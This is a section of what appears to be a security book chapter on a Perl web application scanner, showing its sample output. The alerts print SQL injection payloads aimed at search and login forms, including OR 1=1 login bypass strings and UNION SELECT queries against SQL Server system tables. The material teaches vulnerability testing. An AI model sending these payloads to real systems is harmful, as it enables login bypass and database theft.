9.3. Using the Scanner
You use
extendedScanner.pl in virtually
the same way in which you use simpleScanner.pl.
Like the previous scanner, extendedScanner.pl
requires an input file generated using
parseLog.pl, and it supports the same options.
For reference, here is some sample output from the scanner:
** Extended Web Application Scanner **
** Beginning Scan **
..........
ALERT: Directory Listing Detected:
=> GET /images/
....
ALERT: Database Error Message Detected:
=> POST /search.asp?cat=te'st&searchstring=
..
ALERT: Possible SQL Injection Exploit:
=> POST /search.asp?cat=1'%20OR%201%3D1--&searchstring=
.................
ALERT: Possible SQL Injection Exploit:
=> POST /search.asp?cat=1'%20UNION%20ALL%20SELECT%20CONVERT(INT,1),CONVERT(INT,1),
CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT
(VARCHAR,1)%20FROM%20MASTER..SYSDATABASES--&searchstring=
.......
ALERT: 500 Error Code Detected:
=> GET /template.asp?content=te'st
........................
ALERT: Generic Error Message Detected:
=> POST /login.asp?txtUsername=te'st&txtPassword=password&action=login&
session=1
..
ALERT: Possible SQL Injection Exploit:
=> POST /login.asp?txtUsername=1'%20OR%201%3D1--&txtPassword=password&
action=login&session=1
..................................
ALERT: Possible SQL Injection Exploit:
=> POST /login.asp?txtUsername=1'%20UNION%20ALL%20SELECT%20CONVERT(INT,1),
CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(INT,1),CONVERT(VARCHAR,1),
CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(INT,1),
CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),CONVERT(VARCHAR,1),
CONVERT(VARCHAR,1),CONVERT(VARCHAR,1)%20FROM%20MASTER..SYSDATABASES--&
txtPassword=password&action=login&session=1
.........................
** Scan Complete **
|
لطفا منتظر باشید ...
